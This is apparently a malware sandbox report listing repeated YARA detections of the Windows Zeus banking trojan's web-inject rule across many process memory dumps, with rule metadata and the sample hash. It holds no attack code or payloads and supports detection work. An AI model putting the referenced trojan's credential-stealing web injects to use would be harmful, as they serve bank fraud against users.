Source: 00000002.00000003.1734478353.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1743033227.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1680369624.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.1796972429.0000000001470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1339491124.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2594045872.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000022.00000002.1732800865.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1733978576.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.1711573313.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1722129332.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001A.00000002.1714288290.0000000002490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000015.00000002.1710398106.0000000002170000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1674029436.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.1734272872.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000024.00000002.1733713050.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1342128080.0000000002AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1739375869.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000026.00000002.1740627207.0000000002560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1339398735.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000020.00000002.1727055107.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1675730840.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1742192775.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.1797084342.00000000014D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1738952531.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1745221620.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1716460061.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.1781805646.0000000000630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000026.00000002.1741539824.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000B.00000002.1783966144.0000000002D90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000010.00000002.1708419201.0000000002BA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1744096234.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000018.00000002.1711007542.0000000000D90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.1723103322.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000020.00000002.1726470289.0000000003040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1739760452.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.1718939420.0000000002B00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000018.00000002.1711887152.0000000002A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000B.00000002.1784273852.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1673174622.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
